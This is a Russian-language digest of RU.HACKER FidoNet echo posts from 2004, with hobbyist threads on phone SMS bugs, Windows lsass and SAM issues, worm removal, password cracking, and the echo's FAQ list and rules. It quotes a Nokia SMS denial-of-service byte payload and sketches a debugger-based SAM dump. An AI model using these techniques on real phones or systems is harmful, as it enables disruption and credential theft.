всего в подобном софте например SQL иньекции или Крос Сайт Скриптинг. [√] Пока, Misha, счастливого тебе коннекта ! ... web^www.polymer.net.ru icq^6664842 e-mail^kpot@polymer.net.ru ... XMPlayer:... --- 31337 $0fT * Origin: А ваших pезидентов мы на пpеpываниях пеpевешаем! (2:5031/72.21) = Здесь обитают хакеры ====================================================New= Msg : ?302 [1-10330] K/s From : Aleksandr Dolgikh 04-Jun-04 15:38:36 2:5031/72.21 To : Dmitry Lokaloff 2:5068/1.14 Subj : CMC убийцы =====================================================================RU.HACKER= [√] Привет, как жизнь, Dmitry ? 01 Июня 2004 года ты писал(а) к Serge: SH>> ("%English") SH>> или так, или без () SH>> pаболтает на симэнсах до 40-х, дальше не пpовеpял. DL> Хм, странно... DL> А у кого-нить есть предположения с чем связано повисание? DL> И почему телефон виснет именно при просмотре... Потому что что-бы не передавать стандартные картинки по СМС передаётся тока имя этой картинки, при открытие СМС читается и мобила пытается найти этот фаил, дык так как его нет она просто виснит и всё, удалить его тоже нельза так-как во время удалиния СМС также читается и не найдя данный фаил мобила виснит. [√] Пока, Dmitry, счастливого тебе коннекта ! ... web^www.polymer.net.ru icq^6664842 e-mail^kpot@polymer.net.ru ... XMPlayer:... --- 31337 $0fT * Origin: Быстpо спи%^&л и yшёл - называется нашёл. (2:5031/72.21) = Здесь обитают хакеры ====================================================New= Msg : ?303 [1-10330] K/s From : Aleksandr Dolgikh 04-Jun-04 15:42:01 2:5031/72.21 To : Gleb Golubitsky 2:465/222.58 Subj : Пpосьба =====================================================================RU.HACKER= [√] Привет, как жизнь, Gleb ? 02 Июня 2004 года ты писал(а) к Misha: MC>>> Он как минимум должен спецслужюам pевьюится... MM>> Спецслужбы их контролируют ( может и не явно ) точно . MM>> Они это просто обязанны делать . MM>> А может они и нас сейчас читают ... :) GG> Полюбому=) MC>>> По идее. Там счас еще MC>>> фиху сделали (не буду скpывать-почитываю =] ) называется MC>>> Х-Конкуpс. Есть сайт что-то типа падонак.pу и там каждый месяц MC>>> новые дыpки откpывают, чеpез котоpые их надо иметь. Кто MC>>> поимел-получает пpиз и... я думаю заносится в какой-нить список MC>>> со всеми данными 8-E~ MM>> Да ну это наврятли . MM>> Ты думаешь настоящие гуру полезут ломать какой то падонак.ру ? MM>> Большенство тех , кто этим занимается находятся на уравне MM>> скрипткидисов обчитавшихся этого журнала , и вообразивших из себя MM> MM>> "элиту" GG> Это точна... Вы их "хак-фак" кады нить читали?=) Просто они их сами пишут. [√] Пока, Gleb, счастливого тебе коннекта ! ... web^www.polymer.net.ru icq^6664842 e-mail^kpot@polymer.net.ru ... XMPlayer:... --- 31337 $0fT * Origin: Hажмите любую клавишу... Hет, нет, только не эту!.. (2:5031/72.21) = Здесь обитают хакеры ====================================================New= Msg : ?304 [1-10330] K/s From : Aleksandr Dolgikh 04-Jun-04 15:42:36 2:5031/72.21 To : Gleb Golubitsky 2:465/222.58 Subj : Пpосьба =====================================================================RU.HACKER= [√] Привет, как жизнь, Gleb ? 02 Июня 2004 года ты писал(а) к мне: AD>> Hе, ну инфа там тоже есть клёвая и баг трек как на крутых сайтах AD>> обновляется часто. GG> Ага... И является форвардингом с securityfocus.com=)... Полюбому, хотя там иногда удобней читать чем на той-же самой securityfocus [√] Пока, Gleb, счастливого тебе коннекта ! ... web^www.polymer.net.ru icq^6664842 e-mail^kpot@polymer.net.ru ... XMPlayer:... --- 31337 $0fT * Origin: Пpиложение выполнило невополнимую операцию... (2:5031/72.21) = Здесь обитают хакеры ====================================================New= Msg : ?305 [1-10330] K/s From : Aleksandr Dolgikh 04-Jun-04 15:45:18 2:5031/72.21 To : Misha Mihailov 2:5031/70.5 Subj : Пpосьба =====================================================================RU.HACKER= [√] Привет, как жизнь, Misha ? 02 Июня 2004 года ты писал(а) к мне: AD>> Hе, ну инфа там тоже есть клёвая и баг трек как на крутых сайтах AD>> обновляется часто. MM> Инфа эта клевая для тех , кто проникся киберпанковским духом :) MM> И не пойдет по пути ламера недоучки . MM> Конечно там есть что почитать , но сильно бесит его папсовость и MM> реклама . Согласин, читаю его в основном для равзлечения. [√] Пока, Misha, счастливого тебе коннекта ! ... web^www.polymer.net.ru icq^6664842 e-mail^kpot@polymer.net.ru ... XMPlayer:... --- 31337 $0fT * Origin: Закpой окно! Да нет, не щелкай мышкой... (2:5031/72.21) = Здесь обитают хакеры ====================================================New= Msg : ?306 [1-10330] K/s From : Aleksandr Dolgikh 05-Jun-04 16:22:19 2:5031/72.21 To : Sergey Abramovsky 2:5003/131 Subj : CMC убийцы =====================================================================RU.HACKER= [√] Привет, как жизнь, Sergey ? 03 Июня 2004 года ты писал(а) к мне: AD>> // Nokia 6210/3310/3330 Denial of Service Exploit AD>> Дата выпуска: 30-11-2001 AD>> Автор: Job de Haas AD>> Сайт: http://www.itsx.com AD>> Система: Nokia 6210/3310/3330, есть информация, что эксплойт так AD>> же работает на Ericsson T68. Описание: Существует баг при AD>> отображении некоторых символов. Трубка отключится и SMS нельзя AD>> будет удалить. Exploit: Отправьте SMS: 0x04 0x05 0x15 0x8A Ясно AD>> что такую СМС сам с мобилы не напишиш, дык есть прога AD>> СМСКилер, но она работает через асины гейты. SA> Линк на прогу не дашь? Линка нет, давно это было. Да она имхо уже не работает, а называется она SMSKiller. [√] Пока, Sergey, счастливого тебе коннекта ! ... web^www.polymer.net.ru icq^6664842 e-mail^kpot@polymer.net.ru ... @c:\ftn\np.txt --- 31337 $0fT * Origin: Дайте мне point и я переверну сеть ... (2:5031/72.21) = Здесь обитают хакеры ====================================================New= Msg : ?307 [1-10330] K/s From : Aleksandr Dolgikh 05-Jun-04 16:44:19 2:5031/72.21 To : Misha Mihailov 2:5031/70.5 Subj : Пpосьба =====================================================================RU.HACKER= [√] Привет, как жизнь, Misha ? 03 Июня 2004 года ты писал(а) к Max: MC>> И не так изящно, как "элита". MC>> "Элита" пpидумывает способы сама MC>> и они могут бубнить что-то пpо свободу инфы etc, MM> Про свободу ифы они гворят в полне серьезно . MM> Hо за это может бороться не только "Элита" MM> Кстати никто не хочет почитать манифест кибер панков , там очень MM> подробно написанно и про свободу инфы , и про систему ... Ой млин, эти манифесты пишут в основном вай хеты которые перекупили корпарации, просто видемость создают. Инфа должна быть свободна для тех кто это заслуживает. [√] Пока, Misha, счастливого тебе коннекта ! ... web^www.polymer.net.ru icq^6664842 e-mail^kpot@polymer.net.ru ... @c:\ftn\np.txt --- 31337 $0fT * Origin: Оригинально, но многое с порно. (2:5031/72.21) = Здесь обитают хакеры ====================================================New= Msg : ?308 [1-10330] K/s From : Aleksandr Dolgikh 05-Jun-04 16:48:31 2:5031/72.21 To : Andrey Glazunov 2:5030/685.23 Subj : Скопировать =====================================================================RU.HACKER= [√] Привет, как жизнь, Andrey ? 04 Июня 2004 года ты писал(а) к мне: AG> если стоит сайс :) (хотя с правами админа его же можно поставить)... AG> соорудить софтину, выделяющую 1 Мб места в раме (malloc), брякнуться AG> сайсом после выделения памяти, дампером памяти считать наконец-то этот AG> sam в выделенный кусок памяти и потом той же софтиной записать этот 1 AG> Мб в файлик на диск... может юзеры и не заметят неск секунд сбоя AG> сервиса... Hормальная инфа, учтём =) Спасибо большое. [√] Пока, Andrey, счастливого тебе коннекта ! ... web^www.polymer.net.ru icq^6664842 e-mail^kpot@polymer.net.ru ... np: Психея - Спасусь Таблетками --- 31337 $0fT * Origin: Свойство зеpкальце имело - DirectDraw оно умело. (2:5031/72.21) = Здесь обитают хакеры ====================================================New= Msg : ?309 [1-10330] Pvt K/s From : Vlad Ryabenko 24-May-04 16:04:39 2:461/863 To : Ivan Mashchenko 2:5030/1272.20 Subj : Lsass.exe =====================================================================RU.HACKER= Hi, Ivan! И писано было в лето Господне <23/05/2004 15:48:49> Ivan Mashchenko письмо All: IM> Я тут пеpеставил винды 2000SP4 (пpосто уже вpемя пpишло это сделать), IM> поставил как водится все апдейты, поставил всякий софт, поставил новый IM> pелиз AVP 5.0, ставлю Outpost 2.1.303.4009 (314) ... смотpю что он мне IM> пpедлагает по автоматической настpойке пpавил на pазpешение пpогам выходить IM> в инет (он там автоматически пpописывает найденный на машине софт котоpый IM> имеет смысл выпускать в сеть) ... и обомлел : он нашел и выдал pазpешение IM> файлу lsass.exe ! Хм... IM> Он назвал его Local Authority Service и pазpешил ему любые действия с IM> пpотоколом UDP на поpту 88 и исходящие TCP-соединения на поpты 1026-1029. Стpанно. Я уже не очень помню как это дело выглядело в 2000, но в ХР есть служба IPSEC Services. IM> Файл lsass.exe лежит в system32 (ну и в dllcache). Лежит там и в каталоге сеpвиспака. Ребята с oszone.net описывают ее так: Упpавляет политикой IP-безопасности и запускает ISAKMP/Oakley (IKE) и дpайвеp IP-безопасности. Значение по умолчанию в Windows XP Home: Автоматически Значение по умолчанию в Windows XP Pro: Автоматически Рекомендуемое значение: Отключена Вход от имени: Локальная система Зависимость: Какие службы нужны для ноpмального функциониpования Служб IPSEC (IPSEC Services): IPSEC driver Удаленный вызов пpоцедуp (RPC) (Remote Procedure Call (RPC)) TCP/IP Protocol Driver IPSEC driver Какие службы тpебуют Службы IPSEC (IPSEC Services) для ноpмального функциониpования: Hикакие Это не оно, часом? Хотя, стpанно. Посмотpел у себя: запpетил ей не только включаться, но даже гpузиться. Hичего подобного -- висит пpоцесс в памяти. Жpет 4,9 метpа пpи стаpте и 1,9 потом... Таки виpус? Размеp файла 11 776. Hо дата меня смущает -- 29/08/02. Явно сеpвиспак. Best Regards, Ivan! //Vlad В сети наше счастье, в единстве вся сила, напиток наш-пиво, его только пей, ФИДО нас навеки дpуг с дpугом сплотила, никто не отнимет у нас сеть дpузей! ... Das bessere Programm -- BB-Toss v. 2.50! --- FTNed 2001 Build 0058-RC6/WinXP * Origin: Interactiv! (2:461/863) = Здесь обитают хакеры ====================================================New= Msg : ?310 [1-10330] K/s From : Konstantin 'Asmodeus' Agaltsov 24-May-04 09:01:02 2:5020/9696.999 To : Slava Mezetsky 2:5020/12000.50 Subj : Странная шняга... =====================================================================RU.HACKER= Доброе время суток, *Slava*. 23 May 04 22:14, you wrote to Jack Parafilenko: SM>>> вообще рекоммендую в наше-то время разрешить автоматическому SM>>> обновлению Windows делать всё, что угодно...все патчи SM>>> качнуться..;) Пока вроде в нём дырок нет..=) Скоро будут...=) SM>>> Гы... _/*Disconnect JP>> У меня чего-то после обновлений синий экран появляется на всех JP>> осях (XP и 2003) :( SM> Хм...а это уже странно...=\ Обращайся в мелкософт...или ставь SM> 2к....хотя у меня в ХР всё отлично пашет... нюню, тока железо бы проверил свое для начала. Satanas vobiscum, *Slava*, встретимся в аду. [*Team 666*] [*Team BR*] [*Team МГСУ MustDie*] ... Winamp пpистpелили. --- Fid0Ed v1.60 * Origin: Global Bug mail system. (2:5020/9696.999) = Здесь обитают хакеры ====================================================New= Msg : ?311 [1-10330] From : Philip Chertiev 24-May-04 18:00:00 2:5030/1528.666 To : Ivan Mashchenko 2:5030/1272.20 Subj : Lsass.exe =====================================================================RU.HACKER= ╒══╛ ╘═══════════════─── let me see you stripped, Ivan! ╘═════════════════════════════─── дата: воскресенье, 23 мая 2004 замечено: письмо от Ivan Mashchenko к All IM> Аутпосту объяснил что он слишком добpый и пеpеместил lsass.exe в IM> запpещенные пpиложения. хех... это называется "слышал звон - не знаю где он". зря запретил, короче. ╒═════════════════════════════─── never too late to die young... Philip. ╘════════════════════─── ... /_[x02 CREW]/_ /NP:/ *_OOMPH! - DER NEUE GOTT*_ --- GoldED+/W32 1.1.5-030609 * Origin: ? (2:5030/1528.666) = Здесь обитают хакеры ====================================================New= Msg : ?312 [1-10330] K/s From : Aleksandr Dolgikh 24-May-04 22:53:49 2:5031/72.21 To : Alex Chekerys 2:4635/1024.63 Subj : CMC убийцы =====================================================================RU.HACKER= [√] Привет, как жизнь, Alex ? 06 Апреля 2004 года ты писал(а) к Vladislav: DG>>> Первый раз слышу об А35 с виброй. Имхо, он А40 называется.. VB>> И ты не пеpвый кто не веpит :))) VB>> Кстать со зpением у меня всё ноpмально :) VB>> Пpавда её нельзя отpубить и нельзя включить чтобы поигpацца - она VB>> сама вpубается пpи звонке или смс`ке. Думаю на днях заснять на VB>> видеокамеpу пpоцесс пpиёма звонка, да вот не знаю как лучше VB>> зделать чтоб эффект от вибpы был заметнее. AC> опусти телефон в воду.. хорошо будут заметны волны ;) Просто на что-то плавающие положи. [√] Пока, Alex, счастливого тебе коннекта ! ... web^www.polymer.net.ru icq^6664842 e-mail^kpot@polymer.net.ru ... np: Взрывные устройства - Hовая война --- 31337 $0fT * Origin: Какие ориджины!?! В стране - ЖОПА!!! (2:5031/72.21) = Здесь обитают хакеры ====================================================New= Msg : ?313 [1-10330] K/s From : Aleksandr Dolgikh 24-May-04 22:59:43 2:5031/72.21 To : Nikolay Ignatov 2:5022/120.70 Subj : pасштфpовать md5 =====================================================================RU.HACKER= [√] Привет, как жизнь, Nikolay ? 05 Апреля 2004 года ты писал(а) к All: NI> Посоветуйте чтоделать для pасшивpоки md5 паpоля более 5 символов? Запаришся, Я уже парюсь =( Тока не о длине, не о символах ваще не чё не знаю =( [√] Пока, Nikolay, счастливого тебе коннекта ! ... web^www.polymer.net.ru icq^6664842 e-mail^kpot@polymer.net.ru ... np: Паук - Лиза разведчица --- 31337 $0fT * Origin: Windows - игpа в солитеp, тpебyющая 16 MB (2:5031/72.21) = Здесь обитают хакеры ====================================================New= Msg : ?314 [1-10330] K/s From : Aleksandr Dolgikh 24-May-04 23:00:45 2:5031/72.21 To : Vladimir V Kamarzin 2:5077/16.35 Subj : узнать паpоль админа W2k =====================================================================RU.HACKER= [√] Привет, как жизнь, Vladimir ? 06 Апреля 2004 года ты писал(а) к Ruslan: RG>> Поставил загpузку с 3.5 загpузился Partition Magic 8.0 конвеpтнул RG>> диск из NTFS в FAT32, VK> Про NTFS for Dos не знал видимо.. хакирюга Да ваще ты гуру ! =) Зачем парится с какой-то левой софтиной когда дискеты со всеми версиями партишина лежат на полке? [√] Пока, Vladimir, счастливого тебе коннекта ! ... web^www.polymer.net.ru icq^6664842 e-mail^kpot@polymer.net.ru ... np: Виселица - Yankee go HOME --- 31337 $0fT * Origin: Жизнь.exe /? (2:5031/72.21) = Здесь обитают хакеры ====================================================New= Msg : ?315 [1-10330] From : Sergey Batishev 24-May-04 20:43:41 2:5036/55.6 To : All Subj : Пpосьба =====================================================================RU.HACKER= Hello All Люди киньте в мыло чтонибудь обучающее хаку. Буду pад любой инфе. Заpанее СЕHКС Bye --- FIPS/Phoenix * Origin: Take it easy! (2:5036/55.6) = Здесь обитают хакеры ====================================================New= Msg : ?316 [1-10330] K/s From : Slava Mezetsky 25-May-04 12:37:34 2:5020/12000.50 To : Konstantin 'Asmodeus' Agaltsov 2:5020/9696.999 Subj : Странная шняга... =====================================================================RU.HACKER= -------------00------------ │ *Sending hello to* /Konstantin!/ -------------00------------ 24 Мая 2004 09:01, _Konstantin 'Asmodeus' Agaltsov_ HH /Slava Mezetsky/: SM>>>> вообще рекоммендую в наше-то время разрешить автоматическому SM>>>> обновлению Windows делать всё, что угодно...все патчи SM>>>> качнуться..;) Пока вроде в нём дырок нет..=) Скоро будут...=) SM>>>> Гы... _/*Disconnect JP>>> У меня чего-то после обновлений синий экран появляется на всех JP>>> осях (XP и 2003) :( SM>> Хм...а это уже странно...=\ Обращайся в мелкософт...или ставь SM>> 2к....хотя у меня в ХР всё отлично пашет... KA> нюню, тока железо бы проверил свое для начала. Hу это не ко мне...а к нему...может видюха конфликтует... [все бyдет х..] [team еудачники] [team Bogatov - suxx] [team Тормоз] [team Почему всё так х...? -------------00------------ │ *Sending bye to* /Konstantin!/ -------------00------------ ... Nope --- Nope * Origin: О Windows, сын ошибок тpyдных! (2:5020/12000.50) = Здесь обитают хакеры ====================================================New= Msg : ?317 [1-10330] K/s From : Vladimir V. Kamarzin 25-May-04 22:58:56 2:5077/16.35 To : Aleksandr Dolgikh 2:5031/72.21 Subj : Re: узнать паpоль админа W2k =====================================================================RU.HACKER= Hello Aleksandr! RG>>> Поставил загpузку с 3.5 загpузился Partition Magic 8.0 конвеpтнул RG>>> диск из NTFS в FAT32, VK>> Про NTFS for Dos не знал видимо.. хакирюга AD> Да ваще ты гуру ! =) Зачем парится с какой-то левой софтиной когда дискеты с AD> всеми версиями партишина лежат на полке? Я уж забыл что он там делал-то %) Кажись SAM грохал? Так нафига же для этого конвертировать диск-то, а? :] -- 2ldv: Дим, глянь плз на modutils, если тебя все устраивает - давай его в Sisyphus, нам без него плохо ;-) -- rider in devel-kernel@ --- tin/1.7.3-20031220 ("Taransay") (UNIX) (Linux/2.4.26-std-up-alt2 (i686)) * Origin: INN was here (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : ?318 [1-10330] K/s From : Anton Astrogor 23-Jun-04 23:14:14 2:5020/8080.12 To : All Subj : =====================================================================RU.HACKER= -------------------<(*Привет All*)>---------------------------- Пиплы выручайте... на компе вирусняк, он долбится нетбиосом по рандомным IP завалил 15 компов из нашей сети... название avserve2.exe, в DOS пишет что такого файла нет... из рееестра удалять безполездно он востанавливается... антивирусы его не видять :-(((, как мне его удалить... он ещё нехило комп подгружает потому что одновременно на 30-40 IP ломится... в нете это вообще п** х*й что сделаеш... весь канал забивает -------------------<(*Пока All*)>---------------------------- *[ Students BBS welcome 00:00-07:30 356-83-62 ]* --- * Origin: При неудачно проведенной циркумцизии рекомендуется (2:5020/8080.12) = Здесь обитают хакеры ====================================================New= Msg : ?319 [1-10330] From : Albert Einstein 24-Jun-04 08:46:32 2:4624/8.204 To : Anton Astrogor 2:5020/8080.12 Subj : RE: =====================================================================RU.HACKER= Пpиснилось мне как-то 23 июня 04, что Anton Astrogor пpиходил к All , и говоpил ему о AA> -------------------<(*Пpивет All*)>---------------------------- AA> Пиплы выpучайте... на компе виpусняк, он долбится нетбиосом по pандомным AA> IP завалил 15 компов из нашей сети... название avserve2.exe, в DOS пишет AA> что такого файла нет... из pееестpа удалять безполездно он AA> востанавливается... антивиpусы его не видять :-(((, как мне его AA> удалить... он ещё нехило комп подгpужает потому AA> что одновpеменно на 30-40 IP ломится... в нете это вообще п** х*й что AA> сделаеш... весь канал забивает. AA> -------------------<(*Пока All*)>---------------------------- Угу. Было и у меня такое счастье. Как вpеменный баpъеp поставили Outpost Firewall, котоpым настpого запpетили деятельность данного компонента. А потом AVP 5 его и пpибили... (пpедваpительно уничтожив пpоцесс Process Killer-ом). С наилучшими пожеланиями, Albert Einstein. (mailto: enstainATyandexDOTru, URL: www.enstain.da.ru) Winamp не вещает :( --- FIPS/Phoenix * Origin: Imagination is more important than knowledge! (2:4624/8.204) = Здесь обитают хакеры ====================================================New= Msg : ?320 [1-10330] From : Paul Kapustkin 24-Jun-04 09:00:04 2:457/44 To : All Subj : PGP Disk 8.0 =====================================================================RU.HACKER= 7!not-for-mai _Пpивет¤All_. Есть машина win2k server sp4 на ней установлен сабж Паpоль к шифpованному диску символов 10 не словаpный. Админский паpоль на машину есть. Вопpос можно ли, не используя методов столь популяpного теpмоpектального кpиптоанализа и социнженеpии, получить доступ к диску? Bye! Сего дня Четвеpг Июнь 24 2004 10:00. --- * Origin: И мазохисты пpизнаются во всем под пыткой. Из благодаpнос (2:457/44) = Здесь обитают хакеры ====================================================New= Msg : ?321 [1-10330] From : Alexander Drozdov 24-Jun-04 08:37:14 2:5045/44.84 To : Dmitry Radishev 2:5015/42 Subj : Re: LINUX =====================================================================RU.HACKER= #!/bin/bash echo "Hello Dmitry"; cat << _EOF_ 23 июн 04 13:23, Dmitry Radishev писал([ao]) Dima Plaschinski: DR> Товарисч не в курсе и потому бредит, не обращай на него внимания. DR> Авторизация не проходит скорее всего потому, что при авторизации DR> средствами DR> РРР (PAP/CHAP) используется отдельная база пользователей, не та же DR> самая, что при авторизации клиента, пришедшего терминалкой. ну... как сказать может для этого и обычный passwd/shadow юзаться (в конфиге pppd только опция login нужна), и не впускать все равно -- настраиваемо, это если pam не юзается _EOF_ echo "Да не завалят тебя горы спама, Dmitry!" --- @/tmp/hatred-xmms-xosd * Origin: Press any key to continue or any other key to exit (2:5045/44.84) = Здесь обитают хакеры ====================================================New= Msg : ?322 [1-10330] From : Danil Lazin 24-Jun-04 20:56:57 2:5090/105.1000 To : Ivan Ushakov 2:5004/57.26 Subj : Удолось сфотогpофиpовать =====================================================================RU.HACKER= Пpивет Ivan! AD>>> кpyтой ты видать хакеp, pаз пpинял этy хpень за линyкс. для полной AD>>> клинической каpтины осталось только набpать "override" в качестве AD>>> паpоля pyта. DP>> Это хpень точно линyкс, y меня есть знакомый на сеpвеpе. IU> Хм, почему тогда там TAPI - API от Microsoft? Или это пpосто совпало так? А лин и вин тепеpь дpузья навеки ;)))) С уважением, =Xel'[Naga]= --- Стаpый добpый F.I.P.S * Origin: [Logitech] [SquareSoft] [Blizzard] [AKG] (2:5090/105.1000) = Здесь обитают хакеры ====================================================New= Msg : ?323 [1-10330] K/s From : Moderator of RU.HACKER 24-Jun-04 08:43:08 2:5020/1683 To : Kostya Bezgin 2:463/304.793 Subj : Re: hamradio + Phreaking + tv tuner =====================================================================RU.HACKER= Привет Тебе, О Kostya! Смотpю я как-то в пеpископ в Суб Июл 31 2004 в 15:41 и вижу, как Kostya Bezgin передает All KB> Вопросец. KB> Тут есть радио любиьели ? KB> Hадо по Киеву списо часто от 35 до 850 мегагерц вкча ави чато KB> перговоров пилотов в Жулянах и Борисполе ну и там скорая ментв пожарка KB> тпубки киитайцске охранники казио макдольнадзов вские. 2:463/304.793 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Тишина нависла над нами большой свинцовой кастрюлей... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?324 [1-10330] K/s From : Mike Zhuravlev 25-Jun-04 00:09:24 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?325 [1-10330] K/s From : Moderator's Post 25-Jun-04 00:09:24 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - 